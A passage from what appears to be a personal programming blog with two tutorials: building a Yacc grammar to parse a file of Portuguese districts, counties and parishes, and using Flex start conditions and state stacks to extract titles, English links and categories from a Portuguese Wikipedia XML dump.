        Parish3_of_Countie1>WikipediaEntry_for_Parish3_of_Countie1,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie1
        !Countie1>WikipediaEntry_for_Countie1;
        Parish1_of_Countie2>WikipediaEntry_for_Parish1_of_Countie2,
        Parish2_of_Countie2>WikipediaEntry_for_Parish2_of_Countie2,
        Parish3_of_Countie2>WikipediaEntry_for_Parish3_of_Countie2,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie2
        !Countie2>WikipediaEntry_for_Countie2;
                .
                .
                .
        !CountieN>WikipediaEntry_for_CountieN|
.
.
.

It have about 43000 lines, the number of parishes in Portugal.

Yacc

An Yacc file is just like an lex file, it is divided in three parts:

DECLARATIONS
%%
GRAMMAR
%%
FUNCTIONS

I Will explain later on, what to put in all those three parts.

The solution

I start to write the following grammar to describe my new file:

OrGeo     -> Districts

Districts -> District '|'
          | Districts District '|'

Distrito  -> IdD Link Counties

Counties -> Countie
          | Counties ';' Countie

Countie  -> Parishes '!' IdC Link

Parishes    -> Parish
          | Parishes ',' Parish

Link      -> '>' l

IdD       -> id

IdC       -> id

Parish     -> IdL Link

IdL       -> id

As id is a name (of the District, Countie or Parish), we will declare it in yacc as a pointer to chars (vals). To do that we create a union like in the first part of yacc file (DECLARATIONS), and add a association with vals with id and l:

%union {
        char *vals;
}

%token  id l

Yacc use that union because you can declare as many associations as you want. We must refer to that union in the lex as yylval.

This is the same as use:

%token  id
%token  l

We now go to lex file and add the rule that the lexical analyzer will meet when find text.

[ a-zA-ZÀ-ú-'.()/'`0-9]+  { yylval.vals = strdup(yytext);
                                    return id; }
[a-zA-ZÀ-ú-'.()/'`0-9_:]+ { yylval.vals = strdup(yytext);
                                    return l; }

Here we are saying that when lex find some text that fills in that regular expression it will return to yacc as an id, so that way we find the names of our cities, or links.

As you can see we have special symbols in our grammar, (!>,;|), so we need to say to lex to return them to yacc, where we need them:

[!>,;|]                           { return yytext[0]; }

I also will say to lex ignore all n and t characters:

[tn]                            { ; }

Making our grammar powerfull

Now our grammar will suffer some adjustments; we will say yacc what to do when it was in some of the derivations of some rule:

OrGeo     : Districts { d = $1; }
          ;
Districts : District '|' { $$ = $1; }
          | Districts District '|' { $$ = catDistricts($1,$2); }
          ;
District  : IdD Link Counties { $$ = addDistrict($1, $2, $3); }
          ;
Counties : Countie { $$ = $1; }
          | Counties ';' Countie { $$ = catCounties($1, $3); }
          ;
Countie  : Parishes '!' IdC Link { $$ = addCountie($1, $3, $4); }
          ;
Parishes    : Parish { $$ = $1; }
          | Parishes ',' Parish { $$ = catParishes($1, $3); }
          ;
Link      : '>' l { $$ = $2; }
          ;
IdD       : id { $$ = $1; }
          ;
IdC       : id { $$ = $1; }
          ;
Parish     : IdL Link { $$ = addParish($1, $2); }
          ;
IdL       : id { $$ = $1; }
          ;

Here we tell yacc how to behave when pass certain derivation of a rule.
We can tell yacc that some rule can return a data type, for example:

%{
#include 
#include 
#include "district.h"

District *d;
%}

%union {
        char *vals;
        Parish *valf;
        Countie *valc;
        District *vald;
}

%type   Link IdL IdD IdC
%type   Parish Parishes
%type   Countie Counties
%type   District Districts

To return something in a rule we refer to that rule as $$, that mean IdL in

IdL       : id

and $1 to refer to that id, and so on. So, that way we can say that $$ = $1, that means, IdL = id.

Funtions catDistricts, addDistrict, addParish, addCountie, catCounties and catParishes, are just functions to create linked list’s and append new elemt’s in one already existent linked list.

The result is a html page with nested liked lists, here is the result.

Notes

All the code, including the code to generate the new file, used to yacc is available here, fell free to use it.





Lexical analysis Wikipedia

13 04 2008

Intro

This year I started to learn processing languages. I started by regular expressions and past few days I began to study the Flex, as with regular expressions we can’t create text filters.
The first job I did was a kind of a dictionary. Getting a source of words and a faithful translation, add all the information in one document.

The problem was finding a good document with many Portuguese words and their translations into English.

With this post I want to teach what I learned from this work.

Wikipedia XML structure

I started by picking up the last dump of Wikipedia-PT and “decipher” the XML where it is stored. The structure is something like that:

<page>
    ...
</page>
<page>
    ...
</page>

And each page tag, expanded, have this structure:

<page>
    <title>TITLE</title>
    <id>PAGE_ID_NUMBER</id>
    <revision>
      <id>ID_REVISION_NUMBER</id>
      <timestamp>TIMESTAMP</timestamp>
      <contributor>
        <username>USERNAME</username>
        <id>ID_CONTRIBUTOR</id>
      </contributor>
      <comment>COMMENT</comment>
      <text xml:space="preserve">WIKIPEDIA_ENTRY</text>
    </revision>
  </page>

So, here we have the variables: TITLE, PAGE_ID_NUMBER, ID_REVISION_NUMBER, TIMESTAMP, USERNAME, ID_CONTRIBUTOR, COMMENT and WIKIPEDIA_ENTRY.

TITLE is the Portuguese word, because the Wikipedia I’ve downloaded is in Portuguese.
But so far, no English word.

Lets expand WIKIPEDIA_ENTRY:

<text xml:space="preserve">
    ...
    [[categoria:CATEGORY]]
    ...
    [[en:ENGLISH]]
    ...
</text>

Here we have the ENGLISH variable that is the corresponding word in English to TITLE. I also want the CATEGORY variable that indicates from what category this entry belong.

As some entries in the Wikipedia have multiple categories lines I am also interested in keep them all.
I want that the output of my program became something like that:

PT - TITLE1
EN - ENGLISH1
Categoria - CATEGORY11
            CATEGORY12
            ...
            CATEGORY1j
...
PT - TITLEi
EN - ENGLISHi
Categoria - CATEGORYi1
            CATEGORYi2
            ...
            CATEGORYij
...

Some entries in the Portuguese Wikipedia do not have the English correspondent version so I will not want those entries.

Lexing

A Lex file have this aspect:

definitions
%%
rules
%%
user code

Let’s focus in rules part:

Rules have the following structure;

%%
REGEX    code
REGEX    code
%%

I know Regular Expressions (REGEX) now, so let’s start to build that thing!

I got me to realize that the part of the TITLE may have not only the entries name, also has the Wikipedia contributors pages, among other things that do not interest me to save.
I start to do a list of all those pages:
{Wikipedia,Usuário,Discussão,Ajuda,Anexo,MediaWiki,Categoria}

So, I have to, somehow, throw away all the pages with the following structure:

  <page>
    <title>["Wikipedia""Usuario""Discussao""Ajuda""Anexo""MediaWiki""Categoria"]:TITLE</title>
    <id>ID_PAGE</id>
    <revision>
      <id>ID_REVISION</id>
      <timestamp>TIMESTAMP</timestamp>
      <contributor>
        <username>USERNAME</username>
        <id>ID_CONTRIBUTOR</id>
      </contributor>
      <comment>COMMENT</comment>
      <text xml:space="preserve">ENTRY</text>
    </revision>
  </page>

After a dozen of lines I start to understand that I have to some how “explain” Lex the structure of the Wikipedia XML file. That way will be easier.

I start to read the Flex manual and I find the Start Conditions, a very clever way to treat a block of information.

Languages like C, HTML and XML are structured by blocks, so Start Conditions may be the way to easily get the information from those.

Start Conditions

If you have a block of code that have this aspect:

<title>TITLE</title>

Our block start with “” and then have a name (that I want) until ‘>’ and then ended with “” string.

So in Lex, we must use Start Conditions and produce the following code:

%x title_sc
anything .|[\n\t\r]
%%
"<title>"            BEGIN(title_sc);
<title_sc>[^>]+      {printf("title=%s\n",yytext);}
<title_sc>"</title>" BEGIN(INITIAL);
{anything}           {;} /* do nothing*/
%%
main() {
        yylex();
}

The %x title_sc declaration is to declare a state exclusive, that means; while we are inside code_sc Flex won’t look rules outside of that, until BEGIN(INITAIL).

In definitions part we can declare variables anything .|[\n\t\r] to use in rules part as {anything}.

The BEGIN(title_sc) statement makes Lex jump to the first line of rule and it start to match the rules that finds there.

We can rewrite the above code like that:

%x title_sc
anything .|[\n\t\r]
%%
"<title>"            BEGIN(title_sc);
<title_sc>{
        [^>]+        {printf("title=%s\n",yytext);}
        "</title>"   BEGIN(INITIAL);
}
{anything}           {;} /* do nothing*/
%%
main() {
        yylex();
}

When Lex find BEGIN(INITIAL) statement it jumps to the first BEGIN(XXX), so we can never be able to use block’s inside other block’s (like XML does).

Of course that’s not true.

Start Conditions inside Start Conditions

Lex have a brilliant way to deal with that. It uses Stack’s to store the state were we are!

The idea is something like that, imagine a mathematical expression:

(1+2)-(3*(4/5))

I can say:

  • 2 or [1,2]
  • 3 or [2,1]
  • 5 or [2,2,2]
  • and so on…

That’s all about keeping the path, our actual position in the tree.

So, now we replace the BEGIN(state) to yy_push_state(state), and to go to the previously block I say yy_pop_state().

With that now I can read structures like that one:

  <page>
    <title>TITLE</title>
      ...
      <text xml:space="preserve">
        ...
        [[Categoria:CATEGORY]]
        ...
        [[en:ENGLISH]]
        ...
      </text>
  </page>

And to do so, I write that Lex code:

%x PAGE TITLE TEXT CATEGORIA EN
%option stack
anything .|[\n\t\r]
notPage ["Wikipedia""Usuário""Discussão""Ajuda""Anexo""MediaWiki""Categoria"]
%%
"<page>"                        yy_push_state(PAGE);
<PAGE>{
        "<title>"{notPagina}    yy_pop_state(); // not a valid page
        "<title>"               yy_push_state(TITLE);
        "<text"[^>]+">"         yy_push_state(TEXT);
        "</page>"               yy_pop_state();
        {anything}              /* do nothing */
}
 
<TEXT>{
        "[["[cC]"ategoria:"     yy_push_state(CATEGORIA);
        "[[en:"                 yy_push_state(EN);
        "</text>"               yy_pop_state();
        {anything}              /* do nothing */
}
 
<TITLE>{
        [^<]+                   {
                                        i=0;
                                        imprime(cat, pt, en);
                                        limpa(cat);
                                        pt=NULL; en=NULL;
                                        pt=strdup(yytext);
                                }
        "</title>"              yy_pop_state();
        {anything}              /* do nothing */
}
 
<EN>{
        [^\]]+                  en=strdup(yytext);
        [\]]+                   yy_pop_state();
        "]"\n{anything}         /* do nothing */
}
 
<CATEGORIA>{
        [ \#\!\*\|]+            yy_pop_state();
        [^\]\|\n]+              {
                                        cat[i]=strdup(yytext);
                                        i++;
                                }
        [\]]+                   yy_pop_state();
        "]"\n{anything}         /* do nothing */
}
{anything}                      /* do nothing */
%%
int main() {
        yylex();
        return 0;
}

As you can see we are all the time matching a rule that makes lex jump to another state until one terminal rule (in this case variables affectations) or until pop.

To see all the code go here(.lex).

If you understand Portuguese and feel interested in more information you can go here(.html).

References

flex: The Fast Lexical Analyzer